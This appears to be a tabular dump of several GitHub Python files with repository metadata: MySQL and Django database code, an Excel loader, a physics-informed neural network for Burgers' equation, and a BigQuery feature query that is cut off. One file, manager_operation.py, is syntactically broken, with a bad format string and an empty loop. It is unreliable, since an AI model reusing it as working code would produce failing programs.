blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2 values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107 values | src_encoding stringclasses 20 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4 6.02M | extension stringclasses 78 values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a6066f6913650d57e3ddb4301debeef629944d3d | e97fb7903336837edb6bb3db16ea48512128076e | /22. Database/2. Parameterized/24. RetrieveMultipleRowWhereClauseUserInputDict.py | c2ab4af145f726d2a9c6710e5f457dcc12b68740 | [] | no_license | satyambhatt5/Advance_Python_code | 4081bdb1e80f05161c07f416ebade3907e83f0fd | 58746540285f253699b73aeebd3975911a310deb | refs/heads/master | 2023-05-22T20:10:54.271672 | 2021-06-16T08:55:16 | 2021-06-16T08:55:16 | 377,386,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 684 | py | # Retrieve Multiple Rows WHERE clause - User Input - Dict
import mysql.connector
try:
conn= mysql.connector.connect(
user='root',
password='geek',
host='localhost',
database='pdb',
port=3306
)
if (conn.is_connected()):
print('Connected')
except:
print('Unable to Connect')
sql = 'SELECT * FROM student WHERE roll=%(roll)s'
myc = conn.cursor()
n = int(input('Enter Roll to Display: '))
disp_value = {'roll':n}
try:
myc.execute(sql, disp_value)
row = myc.fetchone()
while row is not None:
print(row)
row = myc.fetchone()
print('Total Rows:',myc.rowcount)
except:
print('Unable to Retrieve Data')
myc.close() # Close Cursor
conn.close() # Close Connection
| [
"bhattsatyam793@gmail.com"
] | bhattsatyam793@gmail.com |
f5baeac0738dfa8508464ce5bcfa5f41ca97435b | 4d343b7e92a44b8c8eb3e3afeeeb0e1a7a699869 | /ch4-practice/books/models.py | feed0423f49f8baba32c13a55d88e9fa25a7ef57 | [] | no_license | dev-iwin/book4-Django-redbook | dfca5395ae68df7536a9e7b64b73b582608b6eaa | 64e0b260b50bae8bd35b918eb341725c3c3373b4 | refs/heads/master | 2023-03-07T05:12:26.990807 | 2021-02-20T21:15:12 | 2021-02-20T21:15:12 | 335,654,957 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 360 | py | from django.db import models
# 예제 4-26을 위한 모델 (혼자 만들어 봄) ==========================
class Book(models.Model):
book_name = models.CharField(max_length=300)
pub_date = models.DateTimeField('publication_date')
def __str__(self):
return self.book_name
# ============================================================= | [
"iwinoriwin@gmail.com"
] | iwinoriwin@gmail.com |
9d7583c7323addf3ab2d996bdee7b43f98b3cd44 | 5206c5cb92493524bb961f74cf8c4ed9f175256c | /excel/book.py | ee85b6c767b2b5051baa3b53dc3067ba025d3e2e | [
"MIT"
] | permissive | cicicici/hopper | 269dea6f5770faf4bb4d63171e50b5d0d8bd3547 | d0ed0307c50ab56631960b4488c43a2d098d6bb4 | refs/heads/master | 2021-06-26T23:33:15.819383 | 2020-05-30T22:04:15 | 2020-11-15T04:27:29 | 181,275,748 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,032 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import datetime
from copy import copy, deepcopy
from openpyxl import load_workbook
from ..util.opt import Opt
from ..util.fs import file_exist
from ..debug import log, dump
from .sheet import load_sheet, clear_sheet_cache
def load_book(filename, title_sheet_map, title_field_map):
if not file_exist(filename):
return None
wb = load_workbook(filename)
sheets = Opt()
names = []
for sheetname in wb.sheetnames:
if sheetname in title_sheet_map:
name = title_sheet_map[sheetname]
else:
name = sheetname
sheets[name] = load_sheet(wb, sheetname, title_field_map)
names.append({sheetname: name})
log.trace(log.DC.STD, "Book: {}, sheets {}".format(filename, names))
return Opt(wb=wb, sheets=sheets)
def clear_book_cache(book):
for name, sheet in book.sheets.items():
clear_sheet_cache(sheet)
| [
"cicicici@gmail.com"
] | cicicici@gmail.com |
78ed13b0780bb2c0014ed4438af5a92688327eef | 920a89c94cb5a133c37d45688e182f009699da1f | /QRes/main/continuous_time_inference (Burgers)/Burgers.py | dd004bd46a2446515fd5527da9804da3495184bf | [
"MIT"
] | permissive | udemirezen/qres | d8a9d764d9b6ccde923be287044398db4bfd2d32 | eeb9b0a449b6ac8cd55f4bb2d11ce1d3071d975d | refs/heads/master | 2023-03-06T09:37:12.852005 | 2021-02-17T19:45:40 | 2021-02-17T19:45:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,368 | py | """
@author: Maziar Raissi
"""
import sys
sys.path.insert(0, '../../Utilities/')
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import scipy.io
from scipy.interpolate import griddata
from pyDOE import lhs
from plotting import newfig, savefig
from mpl_toolkits.mplot3d import Axes3D
import time
import matplotlib.gridspec as gridspec
from mpl_toolkits.axes_grid1 import make_axes_locatable
np.random.seed(1234)
tf.set_random_seed(1234)
tf.logging.set_verbosity(tf.logging.ERROR)
class PhysicsInformedNN:
# Initialize the class
def __init__(self, X_u, u, X_f, layers, lb, ub, nu):
self.lb = lb
self.ub = ub
self.x_u = X_u[:,0:1]
self.t_u = X_u[:,1:2]
self.x_f = X_f[:,0:1]
self.t_f = X_f[:,1:2]
self.u = u
self.layers = layers
self.nu = nu
# Initialize NNs
self.weights, self.biases = self.initialize_NN(layers)
# tf placeholders and graph
self.sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True,
log_device_placement=True))
self.x_u_tf = tf.placeholder(tf.float32, shape=[None, self.x_u.shape[1]])
self.t_u_tf = tf.placeholder(tf.float32, shape=[None, self.t_u.shape[1]])
self.u_tf = tf.placeholder(tf.float32, shape=[None, self.u.shape[1]])
self.x_f_tf = tf.placeholder(tf.float32, shape=[None, self.x_f.shape[1]])
self.t_f_tf = tf.placeholder(tf.float32, shape=[None, self.t_f.shape[1]])
self.u_pred = self.net_u(self.x_u_tf, self.t_u_tf)
self.f_pred = self.net_f(self.x_f_tf, self.t_f_tf)
self.loss = tf.reduce_mean(tf.square(self.u_tf - self.u_pred)) + \
tf.reduce_mean(tf.square(self.f_pred))
self.optimizer = tf.contrib.opt.ScipyOptimizerInterface(self.loss,
method = 'L-BFGS-B',
options = {'maxiter': 50000,
'maxfun': 50000,
'maxcor': 50,
'maxls': 50,
'ftol' : 1.0 * np.finfo(float).eps})
init = tf.global_variables_initializer()
self.sess.run(init)
self.loss_log = []
def initialize_NN(self, layers):
weights = []
biases = []
num_layers = len(layers)
for l in range(0,num_layers-1):
W1 = self.xavier_init(size=[layers[l], layers[l+1]])
W2 = self.xavier_init(size=[layers[l], layers[l+1]])
b = tf.Variable(tf.zeros([1,layers[l+1]], dtype=tf.float32), dtype=tf.float32)
weights.append((W1, W2))
biases.append(b)
return weights, biases
def xavier_init(self, size):
in_dim = size[0]
out_dim = size[1]
xavier_stddev = np.sqrt(2/(in_dim + out_dim))
return tf.Variable(tf.truncated_normal([in_dim, out_dim], stddev=xavier_stddev), dtype=tf.float32)
def neural_net(self, X, weights, biases):
num_layers = len(weights) + 1
H = 2.0*(X - self.lb)/(self.ub - self.lb) - 1.0
for l in range(0,num_layers-2):
W1, W2 = weights[l]
b = biases[l]
H1 = tf.add(tf.matmul(H, W1), b)
H2 = tf.matmul(H, W2)
H = tf.tanh(tf.add(H1 * H2, H1))
W1, W2 = weights[-1]
b = biases[-1]
H1 = tf.add(tf.matmul(H, W1), b)
H2 = tf.matmul(H, W2)
Y = tf.add(H1 * H2, H1)
return Y
def net_u(self, x, t):
u = self.neural_net(tf.concat([x,t],1), self.weights, self.biases)
return u
def net_f(self, x,t):
u = self.net_u(x,t)
u_t = tf.gradients(u, t)[0]
u_x = tf.gradients(u, x)[0]
u_xx = tf.gradients(u_x, x)[0]
f = u_t + u*u_x - self.nu*u_xx
return f
def callback(self, loss):
print('Loss:', loss)
self.loss_log.append(loss)
def train(self):
tf_dict = {self.x_u_tf: self.x_u, self.t_u_tf: self.t_u, self.u_tf: self.u,
self.x_f_tf: self.x_f, self.t_f_tf: self.t_f}
self.optimizer.minimize(self.sess,
feed_dict = tf_dict,
fetches = [self.loss],
loss_callback = self.callback)
def predict(self, X_star):
u_star = self.sess.run(self.u_pred, {self.x_u_tf: X_star[:,0:1], self.t_u_tf: X_star[:,1:2]})
f_star = self.sess.run(self.f_pred, {self.x_f_tf: X_star[:,0:1], self.t_f_tf: X_star[:,1:2]})
return u_star, f_star
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--mod', default='lite', type=str, help='the version of QRes network, can be "full" (2.94k) or "lite" (1.54k).')
args = parser.parse_args()
nu = 0.01/np.pi
noise = 0.0
N_u = 100
N_f = 10000
if args.mod == 'full':
print("Using QRes (full), number of parameters: 2.94k.")
layers = [2, 14, 14, 14, 14, 14, 14, 14, 14, 1]
else:
print("Using QRes (lite), number of parameters: 1.54k.")
layers = [2, 10, 10, 10, 10, 10, 10, 10, 10, 1]
data = scipy.io.loadmat('../Data/burgers_shock.mat')
t = data['t'].flatten()[:,None]
x = data['x'].flatten()[:,None]
Exact = np.real(data['usol']).T
X, T = np.meshgrid(x,t)
X_star = np.hstack((X.flatten()[:,None], T.flatten()[:,None]))
u_star = Exact.flatten()[:,None]
# Doman bounds
lb = X_star.min(0)
ub = X_star.max(0)
xx1 = np.hstack((X[0:1,:].T, T[0:1,:].T))
uu1 = Exact[0:1,:].T
xx2 = np.hstack((X[:,0:1], T[:,0:1]))
uu2 = Exact[:,0:1]
xx3 = np.hstack((X[:,-1:], T[:,-1:]))
uu3 = Exact[:,-1:]
X_u_train = np.vstack([xx1, xx2, xx3])
X_f_train = lb + (ub-lb)*lhs(2, N_f)
X_f_train = np.vstack((X_f_train, X_u_train))
u_train = np.vstack([uu1, uu2, uu3])
idx = np.random.choice(X_u_train.shape[0], N_u, replace=False)
X_u_train = X_u_train[idx, :]
u_train = u_train[idx,:]
model = PhysicsInformedNN(X_u_train, u_train, X_f_train, layers, lb, ub, nu)
start_time = time.time()
model.train()
elapsed = time.time() - start_time
print('Training time: %.4f' % (elapsed))
u_pred, f_pred = model.predict(X_star)
error_u = np.linalg.norm(u_star-u_pred,2)/np.linalg.norm(u_star,2)
print('Error u: %e' % (error_u))
U_pred = griddata(X_star, u_pred.flatten(), (X, T), method='cubic')
Error = np.abs(Exact - U_pred)
######################################################################
############################# Plotting ###############################
######################################################################
fig, ax = newfig(1.0, 1.1)
ax.axis('off')
####### Row 0: u(t,x) ##################
gs0 = gridspec.GridSpec(1, 2)
gs0.update(top=1-0.06, bottom=1-1/3, left=0.15, right=0.85, wspace=0)
ax = plt.subplot(gs0[:, :])
h = ax.imshow(U_pred.T, interpolation='nearest', cmap='rainbow',
extent=[t.min(), t.max(), x.min(), x.max()],
origin='lower', aspect='auto')
divider = make_axes_locatable(ax)
cax = divider.append_axes("right", size="5%", pad=0.05)
fig.colorbar(h, cax=cax)
ax.plot(X_u_train[:,1], X_u_train[:,0], 'kx', label = 'Data (%d points)' % (u_train.shape[0]), markersize = 4, clip_on = False)
line = np.linspace(x.min(), x.max(), 2)[:,None]
ax.plot(t[25]*np.ones((2,1)), line, 'w-', linewidth = 1)
ax.plot(t[50]*np.ones((2,1)), line, 'w-', linewidth = 1)
ax.plot(t[75]*np.ones((2,1)), line, 'w-', linewidth = 1)
ax.set_xlabel('$t$')
ax.set_ylabel('$x$')
ax.legend(frameon=False, loc = 'best')
ax.set_title('$u(t,x)$', fontsize = 10)
####### Row 1: u(t,x) slices ##################
gs1 = gridspec.GridSpec(1, 3)
gs1.update(top=1-1/3, bottom=0, left=0.1, right=0.9, wspace=0.5)
ax = plt.subplot(gs1[0, 0])
ax.plot(x,Exact[25,:], 'b-', linewidth = 2, label = 'Exact')
ax.plot(x,U_pred[25,:], 'r--', linewidth = 2, label = 'Prediction')
ax.set_xlabel('$x$')
ax.set_ylabel('$u(t,x)$')
ax.set_title('$t = 0.25$', fontsize = 10)
ax.axis('square')
ax.set_xlim([-1.1,1.1])
ax.set_ylim([-1.1,1.1])
ax = plt.subplot(gs1[0, 1])
ax.plot(x,Exact[50,:], 'b-', linewidth = 2, label = 'Exact')
ax.plot(x,U_pred[50,:], 'r--', linewidth = 2, label = 'Prediction')
ax.set_xlabel('$x$')
ax.set_ylabel('$u(t,x)$')
ax.axis('square')
ax.set_xlim([-1.1,1.1])
ax.set_ylim([-1.1,1.1])
ax.set_title('$t = 0.50$', fontsize = 10)
ax.legend(loc='upper center', bbox_to_anchor=(0.5, -0.35), ncol=5, frameon=False)
ax = plt.subplot(gs1[0, 2])
ax.plot(x,Exact[75,:], 'b-', linewidth = 2, label = 'Exact')
ax.plot(x,U_pred[75,:], 'r--', linewidth = 2, label = 'Prediction')
ax.set_xlabel('$x$')
ax.set_ylabel('$u(t,x)$')
ax.axis('square')
ax.set_xlim([-1.1,1.1])
ax.set_ylim([-1.1,1.1])
ax.set_title('$t = 0.75$', fontsize = 10)
# savefig('./figures/Burgers')
loss_log = np.array(model.loss_log)
if args.mod == 'full':
np.save('tables/loss.npy', loss_log)
else:
np.save('tables/loss_lite.npy', loss_log)
| [
"noreply@github.com"
] | noreply@github.com |
50d70002d14f44ce996fd1dec2943ab53285f034 | b028f2e9c8dcb5de62fa2c8e9dc3f3f534da3a85 | /player.py | 500a40e397907bee1632db737958868936e1c682 | [] | no_license | iantype/espn-api-v3 | afde0c0ea25126796fafb796e35d5e0abb1c45f4 | ab1137a66c3de201d283e2f4ce28923ab2c717eb | refs/heads/master | 2020-07-29T17:41:06.510089 | 2019-09-20T03:22:24 | 2019-09-20T03:22:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,416 | py | class Player():
"""
playerData = matchupData['schedule'][matchupNum]['home' or 'away']['rosterForCurrentScoringPeriod']['entries'][playerIndex]
"""
def __init__(self, playerData):
self.id = playerData['playerId']
self.positionId = playerData['lineupSlotId']
self.acquisitionType = playerData['acquisitionType']
playerData = playerData['playerPoolEntry']
self.score = playerData['appliedStatTotal'] # Points scored for the given week
playerData = playerData['player']
self.name = playerData['fullName']
self.eligibleSlots = playerData['eligibleSlots']
self.isStarting = self.positionId not in [20, 21, 24]
self.injured = playerData['injured']
self.nflTeamId = playerData['proTeamId']
#self.rankings = playerData['rankings'] # Don't need this... yet?
try:
self.outlook = playerData['outlooks'] # Words describing the outlook for this week
self.seasonOutlook = playerData['seasonOutlook'] # Words describing the outlook for the rest of the season
except:
self.outlook = 'N/A'
self.seasonOutlook = 'N/A'
def __repr__(self):
""" This is what is displayed when print(player) is entered"""
return 'Player(%s)' % (self.name) | [
"44902815+DesiPilla@users.noreply.github.com"
] | 44902815+DesiPilla@users.noreply.github.com |
cf199d07482ca7cf6bc69826181f3bf06463faca | 915ec21b9edc7fb860e4c5251daa844e3f17ba29 | /blog/migrations/0001_initial.py | 42a56d9cd2bdd1638b2a3a2148203f71c7b3e6a9 | [] | no_license | ip0000h/django_blog_test | 3b389d8caa13ef64f9b27d9f32d17cea8c9f3ea0 | 9e801f04fbf0374c337bf4f0a8e5d8e0355a556f | refs/heads/master | 2020-05-09T11:21:14.445402 | 2019-04-15T08:55:53 | 2019-04-15T08:55:53 | 181,076,666 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,454 | py | # Generated by Django 2.2 on 2019-04-13 19:07
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Subscription',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('blog', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='blog_subscriptions', to=settings.AUTH_USER_MODEL, verbose_name='blog')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_subscriptions', to=settings.AUTH_USER_MODEL, verbose_name='user')),
],
options={
'unique_together': {('blog', 'user')},
},
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, db_index=True, verbose_name='created')),
('title', models.CharField(max_length=255, verbose_name='title')),
('post', models.TextField(verbose_name='post')),
('blog', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='posts', to=settings.AUTH_USER_MODEL, verbose_name='blog')),
],
options={
'verbose_name': 'post',
'verbose_name_plural': 'posts',
'ordering': ('title',),
'unique_together': {('blog', 'title')},
},
),
migrations.CreateModel(
name='FeedPost',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('is_read', models.BooleanField(default=False, verbose_name='is_read')),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.Post', verbose_name='post')),
('subscription', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.Subscription', verbose_name='subscription')),
],
),
]
| [
"ip0000h@gmail.com"
] | ip0000h@gmail.com |
18afaf532409eba6920a708a12e22b280b6724d2 | 8ccc597e43ef943a8557ab76128832d01a7fcdfa | /data_fetcher/manager_operation.py | ced834e2bfac1faa3112fb6d5f0ce204f035006f | [
"MIT"
] | permissive | stevensshi/smart-realestate | bd6d43a47e0a22f7d271f655d473c949f285ab15 | f00671a5ec9590b9f5b74595c3599317a722370e | refs/heads/master | 2021-05-01T08:02:51.027912 | 2016-12-31T07:36:06 | 2016-12-31T07:36:08 | 73,804,999 | 4 | 1 | null | 2016-12-19T10:52:25 | 2016-11-15T10:57:32 | CSS | UTF-8 | Python | false | false | 157 | py | import logging
import threading
logging.basicConfig(level=logging.DEBUG,format='(%(threadName)-10s) % (message)s')
for t in threading.enumerate():
| [
"steven_s_shi@hotmail.com"
] | steven_s_shi@hotmail.com |
4f21b4b3a8ca36eeeaf81c234a6043a8e8b14977 | f833f28c013e05ddf0266ee295d765f7f8013cb5 | /features/bert_similarity_between_engaged_tweet_and_engaging_surfacing_tweet_vectors_feature.py | 485dec2aba582071ab4b778532b7dd6dc617e9ff | [
"Apache-2.0"
] | permissive | yifanzhu314/recsys2020-challenge | e94aa68e44d1b4f01a9bce748f991b8aae4ed7f3 | d9967860cc4767380d28d2ed7af00d467cc6941a | refs/heads/master | 2022-12-27T04:37:13.424485 | 2020-06-23T01:05:00 | 2020-06-23T01:05:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 74,601 | py | from typing import List, Tuple
from google.cloud import bigquery, bigquery_storage_v1beta1
import pandas as pd
from base import BaseFeature, reduce_mem_usage
class BertSimilarityBetweenTweetAndEngagingSurfacingTweetVectorsFeature(BaseFeature):
# 使わない
def import_columns(self) -> List[str]:
...
def make_features(
self, df_train_input: pd.DataFrame, df_test_input: pd.DataFrame
) -> Tuple[pd.DataFrame, pd.DataFrame]:
...
def read_and_save_features(
self,
train_table_name: str,
test_table_name: str,
train_output_path: str,
test_output_path: str,
) -> None:
df_train_features = self._read_from_bigquery(train_table_name)
df_test_features = self._read_from_bigquery(test_table_name)
df_train_features.columns = f"{self.name}_" + df_train_features.columns
df_test_features.columns = f"{self.name}_" + df_test_features.columns
if self.save_memory:
self._logger.info("Reduce memory size - train data")
df_train_features = reduce_mem_usage(df_train_features)
self._logger.info("Reduce memory size - test data")
df_test_features = reduce_mem_usage(df_test_features)
self._logger.info(f"Saving features to {train_output_path}")
df_train_features.to_feather(train_output_path)
self._logger.info(f"Saving features to {test_output_path}")
df_test_features.to_feather(test_output_path)
def _read_from_bigquery(self, table_name: str) -> pd.DataFrame:
self._logger.info(f"Reading from {table_name}")
query = _QUERY.format(table_name=table_name)
if self.debugging:
query += " limit 10000"
bqclient = bigquery.Client(project=self.PROJECT_ID)
bqstorageclient = bigquery_storage_v1beta1.BigQueryStorageClient()
df = (
bqclient.query(query)
.result()
.to_dataframe(bqstorage_client=bqstorageclient)
)
return df
_QUERY = r"""
with surfacing_tweets as (
select tweet_id, engaging_user_id
from `recsys2020.training` t
group by tweet_id, engaging_user_id
),
user_surfacing_tweet_vectors as (
select
engaging_user_id as user_id,
avg(gap_0) as gap_0,
avg(gap_1) as gap_1,
avg(gap_2) as gap_2,
avg(gap_3) as gap_3,
avg(gap_4) as gap_4,
avg(gap_5) as gap_5,
avg(gap_6) as gap_6,
avg(gap_7) as gap_7,
avg(gap_8) as gap_8,
avg(gap_9) as gap_9,
avg(gap_10) as gap_10,
avg(gap_11) as gap_11,
avg(gap_12) as gap_12,
avg(gap_13) as gap_13,
avg(gap_14) as gap_14,
avg(gap_15) as gap_15,
avg(gap_16) as gap_16,
avg(gap_17) as gap_17,
avg(gap_18) as gap_18,
avg(gap_19) as gap_19,
avg(gap_20) as gap_20,
avg(gap_21) as gap_21,
avg(gap_22) as gap_22,
avg(gap_23) as gap_23,
avg(gap_24) as gap_24,
avg(gap_25) as gap_25,
avg(gap_26) as gap_26,
avg(gap_27) as gap_27,
avg(gap_28) as gap_28,
avg(gap_29) as gap_29,
avg(gap_30) as gap_30,
avg(gap_31) as gap_31,
avg(gap_32) as gap_32,
avg(gap_33) as gap_33,
avg(gap_34) as gap_34,
avg(gap_35) as gap_35,
avg(gap_36) as gap_36,
avg(gap_37) as gap_37,
avg(gap_38) as gap_38,
avg(gap_39) as gap_39,
avg(gap_40) as gap_40,
avg(gap_41) as gap_41,
avg(gap_42) as gap_42,
avg(gap_43) as gap_43,
avg(gap_44) as gap_44,
avg(gap_45) as gap_45,
avg(gap_46) as gap_46,
avg(gap_47) as gap_47,
avg(gap_48) as gap_48,
avg(gap_49) as gap_49,
avg(gap_50) as gap_50,
avg(gap_51) as gap_51,
avg(gap_52) as gap_52,
avg(gap_53) as gap_53,
avg(gap_54) as gap_54,
avg(gap_55) as gap_55,
avg(gap_56) as gap_56,
avg(gap_57) as gap_57,
avg(gap_58) as gap_58,
avg(gap_59) as gap_59,
avg(gap_60) as gap_60,
avg(gap_61) as gap_61,
avg(gap_62) as gap_62,
avg(gap_63) as gap_63,
avg(gap_64) as gap_64,
avg(gap_65) as gap_65,
avg(gap_66) as gap_66,
avg(gap_67) as gap_67,
avg(gap_68) as gap_68,
avg(gap_69) as gap_69,
avg(gap_70) as gap_70,
avg(gap_71) as gap_71,
avg(gap_72) as gap_72,
avg(gap_73) as gap_73,
avg(gap_74) as gap_74,
avg(gap_75) as gap_75,
avg(gap_76) as gap_76,
avg(gap_77) as gap_77,
avg(gap_78) as gap_78,
avg(gap_79) as gap_79,
avg(gap_80) as gap_80,
avg(gap_81) as gap_81,
avg(gap_82) as gap_82,
avg(gap_83) as gap_83,
avg(gap_84) as gap_84,
avg(gap_85) as gap_85,
avg(gap_86) as gap_86,
avg(gap_87) as gap_87,
avg(gap_88) as gap_88,
avg(gap_89) as gap_89,
avg(gap_90) as gap_90,
avg(gap_91) as gap_91,
avg(gap_92) as gap_92,
avg(gap_93) as gap_93,
avg(gap_94) as gap_94,
avg(gap_95) as gap_95,
avg(gap_96) as gap_96,
avg(gap_97) as gap_97,
avg(gap_98) as gap_98,
avg(gap_99) as gap_99,
avg(gap_100) as gap_100,
avg(gap_101) as gap_101,
avg(gap_102) as gap_102,
avg(gap_103) as gap_103,
avg(gap_104) as gap_104,
avg(gap_105) as gap_105,
avg(gap_106) as gap_106,
avg(gap_107) as gap_107,
avg(gap_108) as gap_108,
avg(gap_109) as gap_109,
avg(gap_110) as gap_110,
avg(gap_111) as gap_111,
avg(gap_112) as gap_112,
avg(gap_113) as gap_113,
avg(gap_114) as gap_114,
avg(gap_115) as gap_115,
avg(gap_116) as gap_116,
avg(gap_117) as gap_117,
avg(gap_118) as gap_118,
avg(gap_119) as gap_119,
avg(gap_120) as gap_120,
avg(gap_121) as gap_121,
avg(gap_122) as gap_122,
avg(gap_123) as gap_123,
avg(gap_124) as gap_124,
avg(gap_125) as gap_125,
avg(gap_126) as gap_126,
avg(gap_127) as gap_127,
avg(gap_128) as gap_128,
avg(gap_129) as gap_129,
avg(gap_130) as gap_130,
avg(gap_131) as gap_131,
avg(gap_132) as gap_132,
avg(gap_133) as gap_133,
avg(gap_134) as gap_134,
avg(gap_135) as gap_135,
avg(gap_136) as gap_136,
avg(gap_137) as gap_137,
avg(gap_138) as gap_138,
avg(gap_139) as gap_139,
avg(gap_140) as gap_140,
avg(gap_141) as gap_141,
avg(gap_142) as gap_142,
avg(gap_143) as gap_143,
avg(gap_144) as gap_144,
avg(gap_145) as gap_145,
avg(gap_146) as gap_146,
avg(gap_147) as gap_147,
avg(gap_148) as gap_148,
avg(gap_149) as gap_149,
avg(gap_150) as gap_150,
avg(gap_151) as gap_151,
avg(gap_152) as gap_152,
avg(gap_153) as gap_153,
avg(gap_154) as gap_154,
avg(gap_155) as gap_155,
avg(gap_156) as gap_156,
avg(gap_157) as gap_157,
avg(gap_158) as gap_158,
avg(gap_159) as gap_159,
avg(gap_160) as gap_160,
avg(gap_161) as gap_161,
avg(gap_162) as gap_162,
avg(gap_163) as gap_163,
avg(gap_164) as gap_164,
avg(gap_165) as gap_165,
avg(gap_166) as gap_166,
avg(gap_167) as gap_167,
avg(gap_168) as gap_168,
avg(gap_169) as gap_169,
avg(gap_170) as gap_170,
avg(gap_171) as gap_171,
avg(gap_172) as gap_172,
avg(gap_173) as gap_173,
avg(gap_174) as gap_174,
avg(gap_175) as gap_175,
avg(gap_176) as gap_176,
avg(gap_177) as gap_177,
avg(gap_178) as gap_178,
avg(gap_179) as gap_179,
avg(gap_180) as gap_180,
avg(gap_181) as gap_181,
avg(gap_182) as gap_182,
avg(gap_183) as gap_183,
avg(gap_184) as gap_184,
avg(gap_185) as gap_185,
avg(gap_186) as gap_186,
avg(gap_187) as gap_187,
avg(gap_188) as gap_188,
avg(gap_189) as gap_189,
avg(gap_190) as gap_190,
avg(gap_191) as gap_191,
avg(gap_192) as gap_192,
avg(gap_193) as gap_193,
avg(gap_194) as gap_194,
avg(gap_195) as gap_195,
avg(gap_196) as gap_196,
avg(gap_197) as gap_197,
avg(gap_198) as gap_198,
avg(gap_199) as gap_199,
avg(gap_200) as gap_200,
avg(gap_201) as gap_201,
avg(gap_202) as gap_202,
avg(gap_203) as gap_203,
avg(gap_204) as gap_204,
avg(gap_205) as gap_205,
avg(gap_206) as gap_206,
avg(gap_207) as gap_207,
avg(gap_208) as gap_208,
avg(gap_209) as gap_209,
avg(gap_210) as gap_210,
avg(gap_211) as gap_211,
avg(gap_212) as gap_212,
avg(gap_213) as gap_213,
avg(gap_214) as gap_214,
avg(gap_215) as gap_215,
avg(gap_216) as gap_216,
avg(gap_217) as gap_217,
avg(gap_218) as gap_218,
avg(gap_219) as gap_219,
avg(gap_220) as gap_220,
avg(gap_221) as gap_221,
avg(gap_222) as gap_222,
avg(gap_223) as gap_223,
avg(gap_224) as gap_224,
avg(gap_225) as gap_225,
avg(gap_226) as gap_226,
avg(gap_227) as gap_227,
avg(gap_228) as gap_228,
avg(gap_229) as gap_229,
avg(gap_230) as gap_230,
avg(gap_231) as gap_231,
avg(gap_232) as gap_232,
avg(gap_233) as gap_233,
avg(gap_234) as gap_234,
avg(gap_235) as gap_235,
avg(gap_236) as gap_236,
avg(gap_237) as gap_237,
avg(gap_238) as gap_238,
avg(gap_239) as gap_239,
avg(gap_240) as gap_240,
avg(gap_241) as gap_241,
avg(gap_242) as gap_242,
avg(gap_243) as gap_243,
avg(gap_244) as gap_244,
avg(gap_245) as gap_245,
avg(gap_246) as gap_246,
avg(gap_247) as gap_247,
avg(gap_248) as gap_248,
avg(gap_249) as gap_249,
avg(gap_250) as gap_250,
avg(gap_251) as gap_251,
avg(gap_252) as gap_252,
avg(gap_253) as gap_253,
avg(gap_254) as gap_254,
avg(gap_255) as gap_255,
avg(gap_256) as gap_256,
avg(gap_257) as gap_257,
avg(gap_258) as gap_258,
avg(gap_259) as gap_259,
avg(gap_260) as gap_260,
avg(gap_261) as gap_261,
avg(gap_262) as gap_262,
avg(gap_263) as gap_263,
avg(gap_264) as gap_264,
avg(gap_265) as gap_265,
avg(gap_266) as gap_266,
avg(gap_267) as gap_267,
avg(gap_268) as gap_268,
avg(gap_269) as gap_269,
avg(gap_270) as gap_270,
avg(gap_271) as gap_271,
avg(gap_272) as gap_272,
avg(gap_273) as gap_273,
avg(gap_274) as gap_274,
avg(gap_275) as gap_275,
avg(gap_276) as gap_276,
avg(gap_277) as gap_277,
avg(gap_278) as gap_278,
avg(gap_279) as gap_279,
avg(gap_280) as gap_280,
avg(gap_281) as gap_281,
avg(gap_282) as gap_282,
avg(gap_283) as gap_283,
avg(gap_284) as gap_284,
avg(gap_285) as gap_285,
avg(gap_286) as gap_286,
avg(gap_287) as gap_287,
avg(gap_288) as gap_288,
avg(gap_289) as gap_289,
avg(gap_290) as gap_290,
avg(gap_291) as gap_291,
avg(gap_292) as gap_292,
avg(gap_293) as gap_293,
avg(gap_294) as gap_294,
avg(gap_295) as gap_295,
avg(gap_296) as gap_296,
avg(gap_297) as gap_297,
avg(gap_298) as gap_298,
avg(gap_299) as gap_299,
avg(gap_300) as gap_300,
avg(gap_301) as gap_301,
avg(gap_302) as gap_302,
avg(gap_303) as gap_303,
avg(gap_304) as gap_304,
avg(gap_305) as gap_305,
avg(gap_306) as gap_306,
